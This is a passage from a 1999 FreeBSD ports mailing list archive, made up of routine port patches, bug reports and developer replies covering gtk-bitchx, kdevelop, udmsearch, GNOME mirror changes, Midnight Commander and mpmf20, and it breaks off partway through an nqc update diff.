END-of-/usr/ports/irc/gtk-bitchx/Makefile echo c - /usr/ports/irc/gtk-bitchx/patches mkdir -p /usr/ports/irc/gtk-bitchx/patches > /dev/null 2>&1 echo x - /usr/ports/irc/gtk-bitchx/patches/patch-aa sed 's/^X//' >/usr/ports/irc/gtk-bitchx/patches/patch-aa << 'END-of-/usr/ports/irc/gtk-bitchx/patches/patch-aa' X*** source/irc.c.orig Wed Dec 1 15:52:44 1999 X--- source/irc.c Wed Dec 1 15:53:04 1999 X*************** X*** 457,463 **** X #if defined(WANT_DETACH) && !defined(GUI) X kill_attached_if_needed(0); X #endif X- current_ftarget = stdout; X charset_lat1(); X fprintf(stdout, "\r"); X fflush(stdout); X--- 457,462 ---- END-of-/usr/ports/irc/gtk-bitchx/patches/patch-aa exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 12:40:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from blackdawn.com (deepspace9.dcds.edu [207.231.151.2]) by hub.freebsd.org (Postfix) with ESMTP id C9E3F14C34 for ; Fri, 3 Dec 1999 12:40:47 -0800 (PST) (envelope-from will@blackdawn.com) Received: (from will@localhost) by blackdawn.com (8.9.3/8.9.3) id PAA00481; Fri, 3 Dec 1999 15:39:53 -0500 (EST) (envelope-from will) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <19991203040043I.imura@cs.titech.ac.jp> Date: Fri, 03 Dec 1999 15:39:53 -0500 (EST) From: will andrews To: "R. Imura" Subject: RE: Problem on making kdevelop 1.0beta4.1 Cc: mlobo@nlink.com.br, ports@FreeBSD.ORG Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 02-Dec-99 R. Imura wrote: >> Why do it this way? We'll have to add this in for ALL the ports that are >> based >> on kde/qt USE_NEWGCC! And then when somebody _FINALLY_ decides to add it to >> those ports.. > > I agree with your idea. > But there are about 50 ports having USE_QT=yes (32 ports at FreeBSD-2.2.8) > and you have to change all of the ports at the same time. > In addition, many people will complain to us while a few weeks after the > change for the incompatibility, and we have to say "Please update all > of your qt ports" every time. > I only worry about it. As I've said before, it's just another hurdle.. just like 2.2.x -> 3.x was (and that one was a much bigger hassle than this one will be, for most people anyway). Besides, people who don't want/need cutting edge kdelibs can just use the package system until the whole thing boils over. >> You could send me yours so I can fix my "normal kde" version. :-) >> >> Or is it available on that URL you posted? > > Is it ok? (japanese mail + uuencode) > > http://home.jp.FreeBSD.org/cgi-bin/showmail/ports-jp/8285 uuencode is no problem, but I am not Japanese-lingual, only Latin (7+ years of study), C/C++, Pascal, English, (z,ba)sh, and others. :-) However, I looked up the mailing list archives for this ML, and found that kde.gr.jp URL and downloaded your tarball.. thanks. :-) Hopefully this'll help me smoothen out the kdevelop port I have. -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 13: 4:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from ns.skylink.it (ns.skylink.it [194.177.113.1]) by hub.freebsd.org (Postfix) with ESMTP id 5B21215288; Fri, 3 Dec 1999 13:04:42 -0800 (PST) (envelope-from hibma@skylink.it) Received: from skylink.it (va-154.skylink.it [194.185.55.154]) by ns.skylink.it (8.9.1/8.8.8) with ESMTP id WAA09971; Fri, 3 Dec 1999 22:04:34 +0100 Received: from localhost (localhost [127.0.0.1]) by skylink.it (8.9.3/8.9.3) with ESMTP id PAA00309; Fri, 3 Dec 1999 15:36:48 +0100 (CET) (envelope-from hibma@skylink.it) Date: Fri, 3 Dec 1999 15:36:47 +0100 (CET) From: Nick Hibma X-Sender: n_hibma@henny.jrc.it Reply-To: Nick Hibma To: FreeBSD CURRENT Mailing List , FreeBSD Ports Mailing List Subject: modules in ports Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Has anyone ever devised a good way to put a module in a port? Like so: module usio firmware in hex and source format. They are strongly connected in that the API in the firmware might change. Maybe it is the more general question of how to relate modules to other parts of the base system, like the kernel, downloadable firmware files, etc. Nick -- hibma@skylink.it n_hibma@freebsd.org USB project http://www.etla.net/~n_hibma/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 13:30:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 898B714D25 for ; Fri, 3 Dec 1999 13:30:51 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA90696; Fri, 3 Dec 1999 13:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 3 Dec 1999 13:30:04 -0800 (PST) Message-Id: <199912032130.NAA90696@freefall.freebsd.org> To: freebsd-ports@FreeBSD.org Cc: From: Kelly Yancey Subject: Re: ports/15166: update udmsearch port to 2.2.1 Reply-To: Kelly Yancey Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR ports/15166; it has been noted by GNATS. From: Kelly Yancey To: freebsd-gnats-submit@freebsd.org Cc: Subject: Re: ports/15166: update udmsearch port to 2.2.1 Date: Fri, 3 Dec 1999 16:19:10 -0500 (EST) Despite my good inentions, Bill Fumerola pointed out that I really should have submitted the fix to this PR as a diff -ruN. So attached is just such a diff taken from ports/www. You have to apply that original patch included in this PR first, then this one to have a correct port. Kelly -- Kelly Yancey - kbyanc@posi.net - Richmond, VA Director of Technical Services, ALC Communications http://www.alcnet.com/ Maintainer, BSD Driver Database http://www.posi.net/freebsd/drivers/ Coordinator, Team FreeBSD http://www.posi.net/freebsd/Team-FreeBSD/ diff -ruN udmsearch.orig/patches/patch-aa udmsearch/patches/patch-aa --- udmsearch.orig/patches/patch-aa Wed Dec 31 19:00:00 1969 +++ udmsearch/patches/patch-aa Thu Dec 2 22:13:29 1999 @@ -0,0 +1,15 @@ +--- doc/Makefile.in.orig Thu Dec 2 22:11:39 1999 ++++ doc/Makefile.in Thu Dec 2 22:12:27 1999 +@@ -261,9 +261,9 @@ + + + install-data-local: +- $(mkinstalldirs) $(prefix)/doc +- echo ${INSTALL_DATA} docs $(DESTDIR)$(prefix)/doc/ +- ${INSTALL_DATA} ${txt_DOCS} $(DESTDIR)$(prefix)/doc/ ++ $(mkinstalldirs) $(prefix)/share/doc/udmsearch ++ echo ${INSTALL_DATA} docs $(DESTDIR)$(prefix)/share/doc/udmsearch ++ ${INSTALL_DATA} ${txt_DOCS} $(DESTDIR)$(prefix)/share/doc/udmsearch + + # Tell versions [3.59,3.63) of GNU make to not export all variables. + # Otherwise a system limit (for SysV at least) may be exceeded. diff -ruN udmsearch.orig/pkg/PLIST udmsearch/pkg/PLIST --- udmsearch.orig/pkg/PLIST Thu Dec 2 21:59:37 1999 +++ udmsearch/pkg/PLIST Thu Dec 2 22:38:35 1999 @@ -1,14 +1,18 @@ bin/udmsearch/search.cgi -bin/udmsearch/search.php3 -bin/udmsearch/morph.php3 -bin/udmsearch/udmsearch.gif +bin/udmsearch/search.phtml etc/udmsearch/indexer.conf-dist etc/udmsearch/search.htm-dist etc/udmsearch/create/msql/create.txt +etc/udmsearch/create/mssql/create.txt etc/udmsearch/create/mysql/alter19-20.txt etc/udmsearch/create/mysql/alter20-21.txt etc/udmsearch/create/mysql/create.txt etc/udmsearch/create/pgsql/create.txt +etc/udmsearch/create/odbc-mysql/create.txt +etc/udmsearch/create/odbc-pgsql/create.txt +etc/udmsearch/create/solid/README +etc/udmsearch/create/solid/create.txt +etc/udmsearch/create/stopwords/stop.cz.txt etc/udmsearch/create/stopwords/stop.de.txt etc/udmsearch/create/stopwords/stop.en.txt etc/udmsearch/create/stopwords/stop.es.txt @@ -19,12 +23,20 @@ etc/udmsearch/create/stopwords/stop.pt.txt etc/udmsearch/create/stopwords/stop.ru.txt etc/udmsearch/create/stopwords/stop.ua.txt -doc/UdmSearch.sgml +share/doc/udmsearch/parsers.txt +share/doc/udmsearch/syslog.txt +share/doc/udmsearch/templates.txt +share/doc/udmsearch/usage.txt sbin/indexer @dirrm bin/udmsearch @dirrm etc/udmsearch/create/msql +@dirrm etc/udmsearch/create/mssql @dirrm etc/udmsearch/create/mysql @dirrm etc/udmsearch/create/pgsql +@dirrm etc/udmsearch/create/odbc-mysql +@dirrm etc/udmsearch/create/odbc-pgsql +@dirrm etc/udmsearch/create/solid @dirrm etc/udmsearch/create/stopwords @dirrm etc/udmsearch/create @dirrm etc/udmsearch +@dirrm share/doc/udmsearch To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 13:31: 0 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D8527152E5 for ; Fri, 3 Dec 1999 13:30:51 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA90705; Fri, 3 Dec 1999 13:30:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from anaconda.lovett.com (anaconda.lovett.com [216.60.121.168]) by hub.freebsd.org (Postfix) with ESMTP id 1BD6914D25 for ; Fri, 3 Dec 1999 13:27:02 -0800 (PST) (envelope-from ade@lovett.com) Received: from ade by anaconda.lovett.com with local (Exim 3.03 #1) id 11u0DW-000OKh-00 for FreeBSD-gnats-submit@freebsd.org; Fri, 03 Dec 1999 15:26:14 -0600 Message-Id: Date: Fri, 03 Dec 1999 15:26:14 -0600 From: Ade Lovett Reply-To: ade@lovett.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15248: GNOME updates: ftp.gnome.org has changed Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15248 >Category: ports >Synopsis: GNOME updates: ftp.gnome.org has changed >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 13:30:04 PST 1999 >Closed-Date: >Last-Modified: >Originator: Ade Lovett >Release: FreeBSD 3.3-STABLE i386 >Organization: Lovett Network Consultancy >Environment: Up to date ports tree. >Description: Those nice GNOME folks have gone and completely changed the layout of ftp.gnome.org -- as I type this, the changes are also propogating to the mirrors. >How-To-Repeat: Pick a port at random that uses MASTER_SITE_GNOME, make sure it's not locally present, and then try to fetch it. I've tagged this PR as serious/medium, since it will need to be applied fairly quickly. In addition, can somebody take a peek at PR 15238 (which led to this PR). Somehow, it's been assigned to me (ade@lovett.com) instead of freebsd-ports, and I don't have the magic runes to do anything about it :) >Fix: Patchfile is at: http://www.lovett.com/FreeBSD/gnome-ftp-layout-changes The following ports are affected (I think I got them all) audio/esound audio/gnomeaudio audio/gnomemedia audio/libaudiofile deskutils/gnomepim devel/ORBit devel/bonobo devel/libglade devel/libgtop games/gnomegames graphics/electriceyes graphics/eog graphics/gdk-pixbuf graphics/imlib lang/gnomeobjc math/gnumeric misc/gnomeusersguide misc/gnomeutils misc/mc net/gnomenetwork print/ggv print/gnomeprint sysutils/gnomeadmin sysutils/gnomecontrolcenter sysutils/gtop textproc/libxml x11/gnomecore x11/gnomelibs x11-fm/gnomemc x11-toolkits/gtk-- x11-toolkits/gtk-engines >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 13:42:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DCCB21528A; Fri, 3 Dec 1999 13:42:19 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA92719; Fri, 3 Dec 1999 13:41:51 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Fri, 3 Dec 1999 13:41:51 -0800 (PST) From: Message-Id: <199912032141.NAA92719@freefall.freebsd.org> To: steve@FreeBSD.org, freebsd-ports@FreeBSD.org, steve@FreeBSD.org Subject: Re: ports/15248: GNOME updates: ftp.gnome.org has changed Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: GNOME updates: ftp.gnome.org has changed Responsible-Changed-From-To: freebsd-ports->steve Responsible-Changed-By: steve Responsible-Changed-When: Fri Dec 3 13:41:19 PST 1999 Responsible-Changed-Why: I'll take this one. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 13:43:48 1999 Delivered-To: freebsd-ports@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 758) id 1A7B71528A; Fri, 3 Dec 1999 13:43:47 -0800 (PST) Received: from localhost (localhost [127.0.0.1]) by hub.freebsd.org (Postfix) with ESMTP id 0587D1CD7BC; Fri, 3 Dec 1999 13:43:47 -0800 (PST) (envelope-from kris@hub.freebsd.org) Date: Fri, 3 Dec 1999 13:43:46 -0800 (PST) From: Kris Kennaway To: Davec Cc: ports@freebsd.org Subject: Re: ssh2 port In-Reply-To: <99120303211100.27957@Amber.XtremeDev.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 3 Dec 1999, Davec wrote: > Tried to build ssh2 (after installing ssh1) from the ports, and I got the > following error: > > SHELL@:No such file or directory > > I added USE_GMAKE= yes to the security/ssh2/Makefile, and tried it again > and it completed successfully. Has anyone else came across this? Problems with ports go to ports@freebsd.org. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 19:17:52 1999 Delivered-To: freebsd-ports@freebsd.org Received: from jade.chc-chimes.com (jade.chc-chimes.com [216.28.46.6]) by hub.freebsd.org (Postfix) with ESMTP id 5FE721502A for ; Fri, 3 Dec 1999 19:17:49 -0800 (PST) (envelope-from billf@chc-chimes.com) Received: by jade.chc-chimes.com (Postfix, from userid 1001) id 6C3F01C4D; Fri, 3 Dec 1999 21:18:44 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by jade.chc-chimes.com (Postfix) with ESMTP id 68C0E381B; Fri, 3 Dec 1999 21:18:44 -0500 (EST) Date: Fri, 3 Dec 1999 21:18:44 -0500 (EST) From: Bill Fumerola To: "Bruce A. Mah" Cc: "Bruce A. Mah" , ports@FreeBSD.ORG Subject: Re: pkg_version (was Re: FreeBSD Port: mergemaster-1.36) In-Reply-To: <199912030118.RAA21714@nimitz.ca.sandia.gov> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 2 Dec 1999, Bruce A. Mah wrote: > PS. I owe apologies to Nik Clayton, Dave Glowacki, Neil Blakey-Milner, > Stefan `Sec` Zehl, and possibly other people, for dropping their > pkg_version patches on the floor. Dave, Neil, and Stefan all have > different ways to fix the "match multiple versions of packages" problem. > I ought to figure out which parts of these should get patched in, but I > seem to have even less free hacking time now than I did when I was > ignoring their patches. :-p I am incredibly busy but will attempt to commit/review these patches if sent to me. The usual warnings about a company trying to meet a deadline and a student trying to prepare for finals apply, so don't expect miracles. Thanks, -- - bill fumerola - billf@chc-chimes.com - BF1560 - computer horizons corp - - ph:(800) 252-2421 - bfumerol@computerhorizons.com - billf@FreeBSD.org - PS. I wish there was a way to send 'free time'. Then again I doubt anyone has any to donate. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 19:40:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 30BA31532C for ; Fri, 3 Dec 1999 19:40:20 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id TAA39124; Fri, 3 Dec 1999 19:40:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from h0050da20495b.ne.mediaone.net (h0050da20495b.ne.mediaone.net [24.218.93.188]) by hub.freebsd.org (Postfix) with ESMTP id 246B31530D for ; Fri, 3 Dec 1999 19:38:43 -0800 (PST) (envelope-from kan@h0050da20495b.ne.mediaone.net) Received: (from kan@localhost) by h0050da20495b.ne.mediaone.net (8.9.3/8.9.3) id WAA12247; Fri, 3 Dec 1999 22:38:09 -0500 (EST) (envelope-from kan) Message-Id: <199912040338.WAA12247@h0050da20495b.ne.mediaone.net> Date: Fri, 3 Dec 1999 22:38:09 -0500 (EST) From: kabaev@mediaone.net Reply-To: ak03@gte.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15250: misc/mc uzip vfs fix Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15250 >Category: ports >Synopsis: MC fail to show contents of ZIP archives >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 3 19:40:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Alexander N. Kabaev >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: FreeBSD 4.0-CURRENT #1: Fri Dec 3 21:09:11 EST 1999 kan@kan.ne.mediaone.net:/usr/src/sys/compile/KAN >Description: Midnight Commander fails to show contents of ZIP files due to the following two problems: a) it expects to find uzip in /usr/bin b) it has a bug in the AWK code used to parse output for DOS generated ZIP's >How-To-Repeat: Select any ZIP file created on DOS/Windows (i.e. WinZip) and press enter - nothing will happen >Fix: Add the following patch as patch-ai to the misc/mc/patches directory --- vfs/extfs/uzip.in Wed Sep 29 16:39:35 1999 +++ vfs/extfs/uzip.in.new Fri Dec 3 22:17:45 1999 @@ -7,7 +7,7 @@ # # -DZIP=/usr/bin +DZIP=/usr/local/bin XZIP="$DZIP/zip -g" XDZIP="$DZIP/zip -d" XUNZIP="$DZIP/unzip" @@ -67,7 +67,7 @@ if ($8 ~ /\/$/) printf "drwxr-xr-x 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, $8 else - printf "-rw-r--r-- 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, substr($0, index($0, $7) + length($7 " ") + printf "-rw-r--r-- 1 %-8d %-8d %8d %s %s %s\n", uid, 0, $1, $5, $6, substr($0, index($0, $7) + length($7 " ")) }' 2>/dev/null fi } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 21:27:21 1999 Delivered-To: freebsd-ports@freebsd.org Received: from midget.dons.net.au (daniel.lnk.telstra.net [139.130.137.70]) by hub.freebsd.org (Postfix) with ESMTP id B9F2214D2F; Fri, 3 Dec 1999 21:27:13 -0800 (PST) (envelope-from darius@dons.net.au) Received: from guppy.dons.net.au (guppy.dons.net.au [203.31.81.9]) by midget.dons.net.au (8.9.3/8.9.1) with ESMTP id PAA07250; Sat, 4 Dec 1999 15:55:04 +1030 (CST) (envelope-from darius@dons.net.au) Message-ID: X-Mailer: XFMail 1.3 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: Date: Sat, 04 Dec 1999 15:53:09 +1030 (CST) From: "Daniel J. O'Connor" To: Nick Hibma Subject: RE: modules in ports Cc: FreeBSD Ports Mailing List Cc: FreeBSD Ports Mailing List , FreeBSD CURRENT Mailing List Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 03-Dec-99 Nick Hibma wrote: > Has anyone ever devised a good way to put a module in a port? Well the skip port creates a module.. > Maybe it is the more general question of how to relate modules to > other parts of the base system, like the kernel, downloadable firmware > files, etc. Urk! :) Creating a module which will build outside the source tree is fairly simple, for an example have a look at wpaul's if_dc driver which does this. Then you can just install in in /usr/local/share/myport/kld and load it from /usr/local/etc/rc.d/myport.sh --- Daniel O'Connor software and network engineer for Genesis Software - http://www.gsoft.com.au "The nice thing about standards is that there are so many of them to choose from." -- Andrew Tanenbaum To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Fri Dec 3 23:51:59 1999 Delivered-To: freebsd-ports@freebsd.org Received: from nimitz.ca.sandia.gov (nimitz.ca.sandia.gov [146.246.243.56]) by hub.freebsd.org (Postfix) with ESMTP id 386F3151B4 for ; Fri, 3 Dec 1999 23:51:48 -0800 (PST) (envelope-from bmah@nimitz.ca.sandia.gov) Received: (from bmah@localhost) by nimitz.ca.sandia.gov (8.9.3/8.9.3) id XAA43987; Fri, 3 Dec 1999 23:51:41 -0800 (PST) Message-Id: <199912040751.XAA43987@nimitz.ca.sandia.gov> X-Mailer: exmh version 2.1.0 09/18/1999 To: Bill Fumerola Cc: "Bruce A. Mah" , ports@FreeBSD.ORG Subject: Re: pkg_version (was Re: FreeBSD Port: mergemaster-1.36) In-Reply-To: Your message of "Fri, 03 Dec 1999 21:18:44 EST." From: bmah@CA.Sandia.GOV (Bruce A. Mah) Reply-To: bmah@CA.Sandia.GOV X-Face: g~c`.{#4q0"(V*b#g[i~rXgm*w;:nMfz%_RZLma)UgGN&=j`5vXoU^@n5v4:OO)c["!w)nD/!!~e4Sj7LiT'6*wZ83454H""lb{CC%T37O!!'S$S&D}sem7I[A 2V%N&+ X-Url: http://www.ca.sandia.gov/~bmah/ Mime-Version: 1.0 Content-Type: multipart/signed; boundary="==_Exmh_-173856031P"; micalg=pgp-sha1; protocol="application/pgp-signature" Content-Transfer-Encoding: 7bit Date: Fri, 03 Dec 1999 23:51:41 -0800 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --==_Exmh_-173856031P Content-Type: text/plain; charset=us-ascii If memory serves me right, Bill Fumerola wrote: > On Thu, 2 Dec 1999, Bruce A. Mah wrote: > > PS. I owe apologies to Nik Clayton, Dave Glowacki, Neil Blakey-Milner, > > Stefan `Sec` Zehl, and possibly other people, for dropping their > > pkg_version patches on the floor. Dave, Neil, and Stefan all have > > different ways to fix the "match multiple versions of packages" problem. > > I ought to figure out which parts of these should get patched in, but I > > seem to have even less free hacking time now than I did when I was > > ignoring their patches. :-p > > I am incredibly busy but will attempt to commit/review these patches > if sent to me. The usual warnings about a company trying to meet a deadline > and a student trying to prepare for finals apply, so don't expect miracles. Understood, and I thank you. I'll dig these up and post them to -ports this weekend. Ideally, I'd have reviewed these and given you one consolidated set of patches to send to you, but this might not happen soon. My "excuse" is that I'm getting married in three weeks and, well, for me, that's a teensy bit more important than improving pkg_version. :-) Thanks, Bruce. PS. Thanks for doing the patches from bin/15162. Also enjoyed your commit message about my email address. --==_Exmh_-173856031P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 5.0i for non-commercial use MessageID: yMBKamZbQurPviEqwRn0iTa/irOHjeEW iQA/AwUBOEjIDNjKMXFboFLDEQJewgCeITK+SFt8J4SAT+ZzVHTB7Ln0yPoAnRP8 MmbVsC6j/dOT2UNBjQ+Sg52q =lnOX -----END PGP SIGNATURE----- --==_Exmh_-173856031P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 0:21:36 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 2BD4A15372 for ; Sat, 4 Dec 1999 00:21:33 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA53726; Sat, 4 Dec 1999 00:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from fysgr387.sn.umu.se (fysgr387.sn.umu.se [130.239.128.239]) by hub.freebsd.org (Postfix) with ESMTP id 9224D1534B for ; Sat, 4 Dec 1999 00:16:00 -0800 (PST) (envelope-from saska@fysgr387.sn.umu.se) Received: (from saska@localhost) by fysgr387.sn.umu.se (8.9.3/8.9.3) id JAA05181; Sat, 4 Dec 1999 09:15:37 +0100 (CET) (envelope-from saska) Message-Id: <199912040815.JAA05181@fysgr387.sn.umu.se> Date: Sat, 4 Dec 1999 09:15:37 +0100 (CET) From: saska@acc.umu.se Reply-To: saska@acc.umu.se To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15252: small fix to remove setuid proposal + master site addition Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15252 >Category: ports >Synopsis: small fix to remove setuid proposal + master site addition >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 00:20:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Markus Holmberg saska@acc.umu.se >Release: FreeBSD 3.3-STABLE i386 >Organization: n/a >Environment: n/a >Description: In my original port submit I made the port display pkg/MESSAGE after install where the user was informed that he/she could install the port as setuid root to make things "easy". Considering the discussions of ports security lately and that this ports code is completely not audited, this should be removed. When the user runs the port and discovers normal user privileges are not sufficient for opening /dev/io, he/she has to decide for himself what the appropriate solution is (and take responsibility). This patch makes the ports install behave more appropriately. The patch also adds a new master site for better availablity. >How-To-Repeat: n/a >Fix: 1. Please delete the file /ports/audio/mpmf20/pkg/MESSAGE from CVS. 2. Apply the patch below. (which is also available from http://www.acc.umu.se/~saska/mpmf20.patch) diff -ru mpmf20.orig/Makefile mpmf20/Makefile --- mpmf20.orig/Makefile Sat Dec 4 08:13:30 1999 +++ mpmf20/Makefile Sat Dec 4 08:24:22 1999 @@ -9,7 +9,8 @@ DISTNAME= mpmf20 PKGNAME= mpmf20-1.01 CATEGORIES= audio -MASTER_SITES= http://www.world.co.uk/sba/ +MASTER_SITES= http://www.world.co.uk/sba/ \ + http://www.acc.umu.se/~saska/ EXTRACT_SUFX= .tgz MAINTAINER= ports@FreeBSD.org @@ -18,8 +19,5 @@ do-install: @${INSTALL_PROGRAM} ${WRKSRC}/mpmf20 ${PREFIX}/bin - -post-install: - @${CAT} ${PKGDIR}/MESSAGE .include Only in mpmf20.orig/pkg: MESSAGE >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Sat Dec 4 0:52: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 53F981517F for ; Sat, 4 Dec 1999 00:52:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA55780; Sat, 4 Dec 1999 00:50:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from kronos.alcnet.com (kronos.alcnet.com [63.69.28.22]) by hub.freebsd.org (Postfix) with ESMTP id 2DAA515378 for ; Sat, 4 Dec 1999 00:40:15 -0800 (PST) (envelope-from kbyanc@kronos.alcnet.com) Received: (from kbyanc@localhost) by kronos.alcnet.com (8.9.3/8.9.3/antispam) id DAA95186; Sat, 4 Dec 1999 03:39:18 -0500 (EST) Message-Id: <199912040839.DAA95186@kronos.alcnet.com> Date: Sat, 4 Dec 1999 03:39:18 -0500 (EST) From: kbyanc@posi.net Reply-To: kbyanc@posi.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15253: update nqc port to 2.0.2 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15253 >Category: ports >Synopsis: update nqc port to 2.0.2 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Dec 4 00:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Kelly Yancey >Release: FreeBSD 3.2-STABLE i386 >Organization: >Environment: >Description: Apply the attached patch in ports/lang to update nqc port to install version 2.0.2 Many nights I stay up late, keeping ports up to date. But how much fun it must be to review patches made while sleepy. >How-To-Repeat: >Fix: diff -ruN nqc.orig/Makefile nqc/Makefile --- nqc.orig/Makefile 